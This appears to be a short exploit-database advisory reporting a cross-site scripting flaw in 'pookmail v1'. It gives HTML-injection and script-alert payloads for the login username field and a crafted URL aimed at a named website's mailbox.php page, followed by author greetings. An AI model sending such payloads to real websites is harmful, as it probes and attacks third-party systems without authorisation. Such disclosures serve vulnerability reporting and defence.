=============================================================== | # Title : pookmail v1 Xss Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on: windows 8.1 Français V.(Pro) | # Vendor : http://up.top4top.net/downf-top4top_0d4ce23cca1-gz.html ============================================================== in username login use payload : ( XSS / HTML Inject ) : <marquee><font color=lime size=32>indoushka</font></marquee> or : <script>alert(1);</script> http://www.sqaresources.net/mailbox.php?email=%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Ealert(/indoushka/)%3C/ScRiPt%3E Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================